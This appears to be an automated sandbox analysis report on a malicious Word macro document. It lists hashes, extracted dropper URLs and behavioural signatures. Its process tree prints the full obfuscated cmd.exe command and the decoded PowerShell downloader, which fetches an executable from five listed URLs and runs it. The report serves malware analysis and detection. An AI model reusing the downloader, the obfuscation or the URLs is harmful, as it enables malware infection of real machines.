Analysis
-
max time kernel
20s -
max time network
23s -
platform
windows7_x64 -
resource
win7v200217 -
submitted
15-03-2020 17:12
General
-
Target
9bc017958890fd2e59a44c33e3a3d39775e6657b5a329d57f5e5399023846a64.doc
-
Size
139KB
-
MD5
9c3c3b387ee4c6e799e78f0f469d91da
-
SHA1
8ad1284839d45414ef258aa1005b53886d2a942f
-
SHA256
9bc017958890fd2e59a44c33e3a3d39775e6657b5a329d57f5e5399023846a64
-
SHA512
7e1dbadc2de68b0df0a57edadf00827bd278cb9f7c1df56a258df012493c178a5e5b5cfba288ed5214642a6805ed8599a81efde914fcde07e7204b314631367d
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
http://www.funtelo.com/58S1xJ09
exe.dropper
http://www.shout4music.com/Kkt4CUPvX2
exe.dropper
http://advustech.com/l5EcamTDy
exe.dropper
http://www.ceeetwh.org/UZwh7EIWD6
exe.dropper
http://www.gmlsoftware.com/itTZIne5M
Signatures
-
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 280 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Blacklisted process makes network request 7 IoCs
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9bc017958890fd2e59a44c33e3a3d39775e6657b5a329d57f5e5399023846a64.doc"1⤵
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\system32\cmd.exec:\HDjzASw\dXUoDSp\rQWBhXVQZ\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set 5k0=DjEYwUizYplXvvcpzfiFOfohJ\:e'ASG,K{1L}TQnm8tykgx/WNB+ ZaI6P2@5;M$d.C4()0s9r=7b-u&&for %f in (64;30;1;31;75;28;50;55;10;28;62;64;20;45;21;75;40;27;4;78;22;77;1;27;14;43;53;50;27;43;66;49;27;77;67;10;18;27;40;43;62;64;1;31;15;75;28;23;43;43;15;26;48;48;4;4;4;66;21;79;40;43;27;10;22;66;14;22;41;48;61;42;30;35;47;24;71;73;60;23;43;43;15;26;48;48;4;4;4;66;72;23;22;79;43;68;41;79;72;18;14;66;14;22;41;48;33;45;43;68;67;5;58;13;11;59;60;23;43;43;15;26;48;48;55;65;13;79;72;43;27;14;23;66;14;22;41;48;10;61;2;14;55;41;38;0;44;60;23;43;43;15;26;48;48;4;4;4;66;14;27;27;27;43;4;23;66;22;74;46;48;5;54;4;23;76;2;56;49;0;57;60;23;43;43;15;26;48;48;4;4;4;66;46;41;10;72;22;21;43;4;55;74;27;66;14;22;41;48;18;43;38;54;56;40;27;61;63;28;66;30;15;10;18;43;69;28;60;28;70;62;64;19;4;79;75;28;8;8;18;28;62;64;58;72;36;53;75;53;28;73;76;61;28;62;64;38;39;72;75;28;51;18;30;28;62;64;29;38;19;75;64;27;40;13;26;43;27;41;15;52;28;25;28;52;64;58;72;36;52;28;66;27;47;27;28;62;21;22;74;27;55;14;23;69;64;13;56;14;53;18;40;53;64;1;31;15;70;34;43;74;44;34;64;20;45;21;66;0;22;4;40;10;22;55;65;19;18;10;27;69;64;13;56;14;32;53;64;29;38;19;70;62;64;11;4;11;75;28;41;41;20;28;62;56;21;53;69;69;31;27;43;78;56;43;27;41;53;64;29;38;19;70;66;10;27;40;46;43;23;53;78;46;27;53;42;71;71;71;71;70;53;34;56;40;13;22;45;27;78;56;43;27;41;53;64;29;38;19;62;64;1;36;18;75;28;29;49;56;28;62;77;74;27;55;45;62;37;37;14;55;43;14;23;34;37;37;64;16;4;16;75;28;19;55;14;28;62;86)do set ZH=!ZH!!5k0:~%f,1!&&if %f==86 powershell "!ZH:~-458!""2⤵
- Suspicious use of WriteProcessMemory
- Process spawned unexpected child process
-
C:\Windows\system32\cmd.exeCmD /V/C"set 5k0=DjEYwUizYplXvvcpzfiFOfohJ\:e'ASG,K{1L}TQnm8tykgx/WNB+ ZaI6P2@5;M$d.C4()0s9r=7b-u&&for %f in (64;30;1;31;75;28;50;55;10;28;62;64;20;45;21;75;40;27;4;78;22;77;1;27;14;43;53;50;27;43;66;49;27;77;67;10;18;27;40;43;62;64;1;31;15;75;28;23;43;43;15;26;48;48;4;4;4;66;21;79;40;43;27;10;22;66;14;22;41;48;61;42;30;35;47;24;71;73;60;23;43;43;15;26;48;48;4;4;4;66;72;23;22;79;43;68;41;79;72;18;14;66;14;22;41;48;33;45;43;68;67;5;58;13;11;59;60;23;43;43;15;26;48;48;55;65;13;79;72;43;27;14;23;66;14;22;41;48;10;61;2;14;55;41;38;0;44;60;23;43;43;15;26;48;48;4;4;4;66;14;27;27;27;43;4;23;66;22;74;46;48;5;54;4;23;76;2;56;49;0;57;60;23;43;43;15;26;48;48;4;4;4;66;46;41;10;72;22;21;43;4;55;74;27;66;14;22;41;48;18;43;38;54;56;40;27;61;63;28;66;30;15;10;18;43;69;28;60;28;70;62;64;19;4;79;75;28;8;8;18;28;62;64;58;72;36;53;75;53;28;73;76;61;28;62;64;38;39;72;75;28;51;18;30;28;62;64;29;38;19;75;64;27;40;13;26;43;27;41;15;52;28;25;28;52;64;58;72;36;52;28;66;27;47;27;28;62;21;22;74;27;55;14;23;69;64;13;56;14;53;18;40;53;64;1;31;15;70;34;43;74;44;34;64;20;45;21;66;0;22;4;40;10;22;55;65;19;18;10;27;69;64;13;56;14;32;53;64;29;38;19;70;62;64;11;4;11;75;28;41;41;20;28;62;56;21;53;69;69;31;27;43;78;56;43;27;41;53;64;29;38;19;70;66;10;27;40;46;43;23;53;78;46;27;53;42;71;71;71;71;70;53;34;56;40;13;22;45;27;78;56;43;27;41;53;64;29;38;19;62;64;1;36;18;75;28;29;49;56;28;62;77;74;27;55;45;62;37;37;14;55;43;14;23;34;37;37;64;16;4;16;75;28;19;55;14;28;62;86)do set ZH=!ZH!!5k0:~%f,1!&&if %f==86 powershell "!ZH:~-458!""3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$SjG='Nal';$Okf=new-object Net.WebClient;$jGp='http://www.funtelo.com/58S1xJ09@http://www.shout4music.com/Kkt4CUPvX2@http://advustech.com/l5EcamTDy@http://www.ceeetwh.org/UZwh7EIWD6@http://www.gmlsoftware.com/itTZIne5M'.Split('@');$Fwu='YYi';$PsL = '975';$TQs='BiS';$ATF=$env:temp+'\'+$PsL+'.exe';foreach($vIc in $jGp){try{$Okf.DownloadFile($vIc, $ATF);$XwX='mmO';If ((Get-Item $ATF).length -ge 80000) {Invoke-Item $ATF;$jLi='AWI';break;}}catch{}}$zwz='Fac';"4⤵
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious use of AdjustPrivilegeToken